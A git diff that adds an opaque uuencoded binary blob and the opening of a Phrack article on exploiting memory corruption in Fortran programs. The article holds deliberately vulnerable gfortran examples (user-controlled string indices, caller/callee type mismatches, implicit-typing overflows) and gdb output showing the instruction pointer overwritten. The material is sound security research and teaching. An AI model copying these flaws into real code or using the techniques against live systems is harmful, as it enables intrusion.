+MKG8PD2=-4S[^Y6NKM0M3;U0*A=IRO590ROEZ32D4RT5E8:505HKE6JFXM)(M
+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
+K!]L#%UZ#\SG2^HZ3Z^0ZN4ZND^OD.KE.KI/KY#JY'IOK_P._5+.W`/@E````
+`
+end
diff --git a/phrack67/11.txt b/phrack67/11.txt
new file mode 100644
index 0000000..321ac2b
--- /dev/null
+++ b/phrack67/11.txt
@@ -0,0 +1,2022 @@
+                              ==Phrack Inc.==
+
+                Volume 0x0e, Issue 0x43, Phile #0x0b of 0x10
+
+|=-----------------------------------------------------------------------=|
+|=--------=[ Exploiting memory corruptions in Fortran programs ]=--------=|
+|=--------=[                  under UNIX/VMS                   ]=--------=|
+|=-----------------------------------------------------------------------=|
+|=-------------------------=[  by Magma /FHC ]=--------------------------=|
+|=------------------------=[ magma@phrack.org ]=-------------------------=|
+|=-----------------------------------------------------------------------=|
+
+                                    ---
+
+                      "aka hacking Fortran for kiddos"
+
+                                    ---
+
+--[ Contents
+
+ 1 - Introduction
+        1.1 - A Fortran tale
+        1.2 - Who cares about Fortran anyway?
+
+ 2 - A short introduction to the language basics
+        2.1 - An overview of Fortran syntax
+        2.2 - Hey Gramps, what's the difference between F77 and F2008?
+
+ 3 - Memory corruption with gfortran
+        3.1 - Buffer overflows
+        3.2 - The number-related issues
+        3.3 - The POINTER abuse
+        3.4 - Other interesting bugs
+
+ 4 - Back to the good ol' OpenVMS friend
+        4.1 - Common Fortran bugs .VS. OpenVMS
+        4.2 - Playing with the heap
+
+ 5 - Prevention: lets use a condom
+
+ 6 - The final words
+
+ 7 - Greetz
+
+ 8 - Bibliography
+
+                                    ---
+
+---[ 1 - Introduction
+
+
+---[ 1.1 - A Fortran tale
+
+Fortran -FORmula TRANslation- is one of the oldest high level programming
+language ever created. Being well aware of the fact that youngsters aren't
+interested anymore in history, I'll go straight to the point.
+
+Fortran is .NOT. (yet) dead (though 'perforated cards' hackers probably 
+are). Not only did it remain actively used in the very underground
+scientific/banking sectors but it also evolved to the point where it got
+its last update in 2008. Hey son, you didn't know that, did you?
+
+Now if you ever took Fortran classes in college/university then there is a
+good chance that your teacher voluntary missed a few things as Fortran is
+generally taught as a procedural programming language for beginners. As
+such, you might have been asked to program some crappy math oriented 
+program with basic features and never really got the chance to play with
+the interesting features of the language.
+
+Fortran was once an old fashioned language with limited features and boring
+syntax constraints. Forget about all that. Nowadays Fortran includes modern
+features such as dynamic allocation and MPI which make it suitable for
+implementing both complex algorithms and parallel computing. Now add that
+to the fact that modern compilers exist for almost all common operating
+systems and that they produce high-lol-ly efficient code which can be 
+linked to C and even Java programs. You can also use GTK or OpenGL if you
+wish. You're impressed kid, I can see that in your eyes.
+
+                                  @(*_*)@
+
+---[ 1.2 - Who cares about Fortran anyway?
+
+Well I do and let me tell you why you should too:
+
+   a. It may not be too good looking at first but at least it's way sexier
+      than COBOL.
+   b. Your father was programming in Fortran using perforated cards and got
+      headaches doing so. Sounds like a cool subject in family diner.
+   c. Vintage web is the best. Just try typing Fortran in google to admire
+      beautiful and authentic Web 0.1 HTML.
+   d. Wikipedia tells us that "It is one of the most popular languages in
+      the area of high-performance computing and is the language used for
+      programs that benchmark and rank the world's fastest supercomputers."
+      We should always believe wikipedia.
+   e. You mastered tabs in python and couldn't think of new ways to be cool
+      on BBS^H^H^HIRC? Well then try to master Fortran 77's indentation
+      constraints. You might even be able to impress chicks. It used to
+      work almost forty years ago (.OR. .NOT.).
+
+Still not convinced? OK so what if Fortran programs were used in strategic
+areas you've only heard of? What if Fortran programs were more buggy [R1] 
+than they seemed? What if you could exploit some appropriate bug in a 
+Fortran program and then own the _whole_ _damn_ _world_? That would be 
+extraordinary, wouldn't it? Well cool down man that would also remain a
+dream :>
+
+                                    ---
+
+---[ 2 - A short introduction to the language basics
+
+In order to properly understand the paper, you'll need the basics in
+Fortran programming. Since Fortran 77 (F77) isn't used anymore, the article
+is focused on F90 (Fortran 90) whose syntax mostly remained compatible
+throughout the different revisions of the standard. Specific features added
+by Fortran 95 (F95) up to Fortran 2008 (F2008) are discussed in Chap 2.2 
+though not really _that_ interesting in the context of this paper. You can 
+easily skip the aforementioned explanation.
+
+
+---[ 2.1 - An overview of Fortran syntax
+
+Fortran is a procedural compiled language whose syntax is quite easy to
+learn albeit sometimes not intuitive. Let's begin with the traditional
+'Hello World':
+
+	-----BEGIN EXAMPLE 1-----
+	$ cat ex1.f90
+		! Dummy comment 
+		PROGRaM EX1                                     [L1]
+		CHARACTER(len=20) :: hellostr='Hello World!'    [L2]
+		write(*,fmt='(A)') hellOstr                     [L3]
+		END PROGRAM                                     [L4]
+	$ gfortran ex1.f90
+	$ ./a.out 
+	Hello World!
+	$
+	-----END EXAMPLE 1-----
+
+   *) '!' marks the beginning of a comment.
+
+   *) A Fortran program is divided in several blocks. [L1] declares the
+      beginning of the PROGRAM (the MAIN_() function) and requires the
+      according 'END' in [L4]. Other types of blocks include FUNCTION and
+      SUBROUTINE, the difference between them being essentially whether or
+      not they return a value.
+
+      Note: This language keywords are case insensitive as shown in [L1].
+
+   *) Variables are declared at the beginning of the blocks and are also
+      case insensitive ([L2] vs [L3]) and preceded by a type. According to
+      the ISO standard [R2], F90 defines five intrinsic types being:
+      INTEGER, REAL, COMPLEX, CHARACTER and LOGICAL.
+
+      An intrinsic type can optionally been followed by a 'type parameter'
+      which can either be 'len' or 'kind'. 'len' allows the programmer to
+      specify how much bytes is required to store the variable for a
+      CHARACTER and so is 'kind' for INTEGER, REAL and LOGICAL types.
+
+      Contrary to the C language, there is a difference between strings and
+      character arrays but both are related to the CHARACTER type:
+
+      CHARACTER(len=1)     :: array(20)  ! 20 bytes array
+      CHARACTER(len=20)    :: string     ! 20 bytes string
+
+   *) read() and write() are the common input/output functions used to read
+      and write files. Amongst the possible parameter, you can specify how
+      to format the variable. The code in [L3] is equivalent to the C line:
+      printf("%s\n", hellOstr);
+
+Now let's see a more advanced example:
+
+	-----BEGIN EXAMPLE 2-----
+	$ cat ex2.f90 
+		SUBROUTINE add(I,J)
+		IMPLICIT NONE                                 [L1]
+		INTEGER(2) :: I                               [L2]
+		INTEGER(2) :: J
+		I = I + J
+		END SUBROUTINE
+
+		PROGRAM EX2
+		CHARACTER(len=20), PARAMETER :: s = &         [L3]
+                'p67 will be the best.'
+		INTEGER*2 :: I = Z'FF'                        [L4]
+		write(*,*) '[1] Before add(), I = ', I
+		CALL add(I,1)
+		write(*,*) '[2] After add(), I = ', I
+		END PROGRAM
+	$ gfortran ex2.f90 
+	$ ./a.out 
+	 [1] Before add(), I =     255
+	 [2] After add(), I =     256                         [L5]
+	$
+	-----END EXAMPLE 2-----
+
+   L1) By default a few variables do not need to be explicitly declared.
+       According to Chap 5.3 of [R2], variables I to N are integers, while 
+       other variables are typed REAL. The directive 'IMPLICIT NONE'
+       forbids this behavior and forces the programmer to properly declare
+       every variable.
+
+   L2) I and J are both signed integers stored on 2 bytes ('short' type in
+       C language).
+
+   L3) Lines can be truncated using the '&' special character. PARAMETER is
+       used to declare the variable as a constant.
+
+   L4) You can initialize the variables in base 8 ('O'), 16 ('Z') and even
+       base 2 ('B').
+
+   L5) When calling functions and subroutines (which from an asm point of
+       view is the same), then arguments are passed by reference contrary
+       to the C where arguments are passed by value.
+
+
+---[ 2.2 - Hey Gramps, what's the difference between F77 and F2008?
+
+First of all, know that F77 is not the first Fortran at all but rather the
+ancestor of F90. It can be seen as the skeleton of the actual "modern"
+language. Decades after decades, the ISO published several revisions of the
+language to bring new functionalities while sometimes deleting ones. For us
+hackers, there is almost no impact except that the newer the language, the
+higher the chance to find bugs thanks to dangerous and misused extensions.
+
+Anyway you should nonetheless be aware of the following -important-
+differences between the revisions:
+
+   *) Fortran 90 brought the POINTER object and the ability to dynamically
+      allocate objects. It also made possible the recursion. This
+      particular feature won't be discussed in this paper.
+
+   *) "Varying character strings" appeared in Fortran 95. This interesting
+      functionality can potentially reduce the risks of bugs induced by the
+      need to copy a buffer into another one (remember that strings have a
+      fixed len in Fortran). Fortunately some compilers don't support it
+      yet (like gfortran) and a lot of programmers aren't even aware of its
+      existence.
+
+   *) Fortran 2003 was designed to allow object oriented programming but
+      frankly speaking, we don't care at all. More interesting are the
+      IEEE floating point arithmetic and the so-called procedure pointers.
+
+      Note that we had to wait 2003 to get a language being able to deal
+      with command line arguments and environment variables. _ridiculous_
+
+   *) Fortran 2008 introduced the parallel processing ability in the
+      language. This will not discussed.
+
+OK enough with the chitchat, let's move on.
+
+                                    ---
+
+---[ 3 - Memory corruption with gfortran
+
+This part introduces the more common bugs that you may encounter while
+auditing/writing Fortran code. While it is essentially focused on gfortran
+(a GCC extension [R3]), the OpenVMS Fortran compiler [R4] will be discussed
+in part 4. This will allow us to make at least partial generalisation of 
+what kind of bugs are likely to be found & exploited in the wild.
+
+People accustomed to Fortran programming already know that Fortran is about
+dealing with numbers (one of the main advantages of Fortran). As a result
+it seems that interesting inputs will be the ones related to number
+manipulation/conversion and string parsing. Now Gramps will show you a few 
+things that might interest you.
+
+
+---[ 3.1 - Buffer overflows
+
+Obviously the buffer overflow is the first type of bug that comes to mind
+when one wants to trigger a bug related to strings/buffers. Luckily, they
+also exist in Fortran but only in situations where the compiler was not
+able to deter them. That would be:
+
+   *) when the user is able to manipulate an index which will be used to
+      access an array or a string. Due to the index provided by the user,
+      the compiler is not able to detect the potential memory corruptions
+      during the compilation.
+
+   *) when the user is implicitly or explicitly changing the type of an
+      object passed by reference to the function.
+
+The index manipulation
+----------------------
+
+Contrary to other languages, Fortran is not able to properly handle invalid
+memory access on runtime. In fact, if an index is out of scope, Fortran
+will not see it and a memory corruption might appear.
+
+Let's see using this tiny string manipulation example:
+
+	-----BEGIN OVERFLOW 1-----
+	$ cat overflow1.f90
+		PROGRAM test
+		CHARACTER(len=30) :: S  ! String of length 30
+		INTEGER(4) I
+
+		S = 'Hello Phrack readers!'
+		read(*,*) I
+		S(I:I) = '.'
+		write(*,*) S
+		END PROGRAM
+	$ gfortran overflow1.f90
+	$ ./a.out
+	3
+	 He.lo Phrack readers!      <-- S was modified with 0x2E
+	$ gdb ./a.out
+	[...]
+	0x080487be <+186>: mov BYTE PTR [ebp+eax*1-0x2b],0x2e
+                                       ; This is the memory write
+                                       ; Do we really control eax?
+	[...]
+	(gdb) b *0x080487be
+	Breakpoint 1 at 0x80487be
+	(gdb) r
+	Starting program: a.out
+	50                          <-- 50 is clearly out of scope! (>30)
+
+	Breakpoint 1, 0x080487be in MAIN__ ()
+	(gdb) print /d $eax
+	$1 = 50
+	(gdb) c
+	Hello Phrack readers!
+
+	Program received signal SIGSEGV, Segmentation fault.
+	0x2e04885b in ?? ()         <-- EIP was corrupted with 0x2E
+	-----END OVERFLOW 1-----
+
+This short example is sufficient to prove that (at least with gfortran)
+there is no runtime check at all. If the user is controlling the index used
+to access a string then it's probably all over. There are two things worth
+to note:
+
+   *) We tricked an out-of-bound memory write due to string manipulation
+      but this could very well have been the same thing with any array
+      (REAL, INTEGERS, CHARACTERS, etc.)
+
+   *) Due to the fact that the INTEGER type is 'signed', we are equally
+      able to write both before and after the buffer. Depending on the
+      situation this might be extremely useful. For example while it's
+      usually more interesting to write past the buffer when it's located
+      on the stack, writing before it (underflow) might be handy when it's
+      located on the heap. Of course that will depend on the situation.
+
+Explicit typing of function parameters
+------------------------------------
+
+A short example is better than confusing explanations:
+
+	-----BEGIN CAST 1-----
+	$ cat cast1.f90 
+		SUBROUTINE dump(S)
+		INTEGER(4) :: S
+		write(*,fmt='(Z10)') S
+		END SUBROUTINE
+
+		PROGRAM CAST
+		CHARACTER(len=6) :: S
+		S='ABCDEF'
+		CALL dump(S)
+		END PROGRAM
+	$ gfortran cast1.f90 
+	$ ./a.out 
+	  44434241
+	-----END CAST 1-----
+
+So we first declare S as a string in the MAIN_ and then call the dump()
+subroutine, S being the argument. Inside dump(), the parameter is declared
+as an INTEGER which results in the appropriate printing. The fact that the
+compiler doesn't check types can lead to very interesting situations:
+
+   *) when the size of S object in dump() is known at compile time and
+      different of the original one.
+
+   *) when the size of S object in dump() is controlled by the user.
+
+The first case will lead to a memory corruption if the size of the argument
+in the function is superior to its real size due to argument being passed
+by reference. The following code is for example incorrect and will lead to
+a program crash:
+
+	-----BEGIN CAST 2-----
+	$ cat cast2.f90 
+		SUBROUTINE dump(S)
+		CHARACTER(len=20) :: S
+		S = 'AAAA'
+		END SUBROUTINE
+		PROGRAM cast2
+		CHARACTER(len=10) :: X
+		X = 'ZZZZZZZZZZZ'
+		CALL dump(X)
+		END PROGRAM
+	$ gfortran ./cast2.f90
+	$ ./a.out 
+	Segmentation fault
+	-----END CAST 2-----
+
+What's happening? 'AAAA' is supposed to be shorter than 'ZZZZZZZZZZZ' so
+why is there a crash? Well S = 'AAAA' means the initialisation of S which
+ultimately results in the 4 first characters being set to 'A' and the other
+16 ones to ' ' (space).
+
+But remember that parameters are passed by reference in Fortran so whatever
+the size of S during the execution of dump(), the size of the real object
+is 10 bytes. In other words, 20 bytes were copied on a 10 bytes buffer. Due
+to the very nature of this bug, it's quite unlikely to find it in the wild.
+However a much more vicious variant with 'implicit typing' is described
+later.
+
+Note: If the size of the argument in the function is actually shorter and
+number-related then it may leads to a truncation bug (discussed in Chap 
+3.2).
+
+Now one could imagine a second case where the programmer is providing the
+size of S as an argument (which is of course a bad practice in Fortran).
+The following code is perfectly legal:
+
+	-----BEGIN CAST 3-----
+	$ cat cast3.f90
+		SUBROUTINE dump(S,L)
+		INTEGER(4)	:: L
+		CHARACTER(len=L) :: S   ! size is a runtime parameter
+		S='AAAA'
+		END SUBROUTINE
+		PROGRAM cast2
+		CHARACTER(len=10) :: X
+		X = 'ZZZZZZZZZZ'
+		CALL dump(X,100)
+		write(*,*) X
+		END PROGRAM
+	$ gfortran cast3.f90 
+	$ ./a.out 
+	10
+	 AAAA
+	$ ./a.out
+	200
+	 AAAA
+	Segmentation fault
+	$
+	-----END CAST 3-----
+
+For a couple of seconds we could be tempted to think that it's a situation
+similar to the one described in [R5] but that would only be true if there
+were a stack allocation. In fact once again the bug is triggered by the
+initialisation of the string. Because of the explicit typing of S, the
+compiler is assuming that S really has a len of L and if L > 10 then a
+memory corruption occurs.
+
+Implicit typing
+---------------
+
+In the life-time of a program, declaring variables every time can be boring
+especially when the use of these variables is limited (consider a DO loop
+variable for example). Because of that, Fortran designers created a rule of
+implicit declaration. As a result in Fortran you can use a few variables
+without declaring them which for us hackers can be really cool as it can
+have side effects. Here is a tiny buggy example:
+
+	-----BEGIN IMPLICIT TYPE 1-----
+	$ cat implicit_typing1.f90 
+		SUBROUTINE set(I)
+		write(*,*) 'How much do u want to read dude ?'
+		read(*,*) I                          [L3]
+		END SUBROUTINE
+
+		PROGRAM IMPLICIT_TYPING
+		IMPLICIT NONE
+		INTEGER(1)	:: A, B              [L1]
+		A = 0
+		B = 0
+		CALL set(B)                          [L2]
+		write(*,*) 'A=',A,'B=',B
+		END PROGRAM
+	$ gfortran implicit_typing1.f90
+	$ ./a.out 
+	 How much do u want to read dude ?
+	1094795585                                   [L4]
+	 A=   65 B=   65                             [L5]
+	$
+	-----END IMPLICIT TYPE 1-----
+
+A, B are declared INTEGERS in the range [-128,+127] [L1] and initialized.
+B is then passed by reference to the set() subroutine [L2] where it gets
+affected a new value [L3]. If the user supplies a large enough integer [L4]
+then B is corrupted [L5]. What happened?
+
+Well the heart of this corruption lies in the implicit typing associated
+with the implicit declaration. Here is what can be read from the official
+documentation [R2]:
+
+                                    ---
+                            Chap 5.3 - IMPLICIT
+
+
+"In each scoping unit, there is a mapping, which may be null, between each
+of the letters A, B, ..., Z and a type (and type parameters). An IMPLICIT
+statement specifies the mapping for the letters in its letter-spec-list.
+IMPLICIT NONE specifies the null mapping for all the letters. If a mapping
+is not specified for a letter, the default for a program unit or an
+interface body is default integer if the letter is I, J, ..., or N and
+default real otherwise, and the default for an internal or module procedure
+is the mapping in the host scoping unit."
+                                    ---
+
+So not declaring I in the set() subroutine had the effect of declaring it
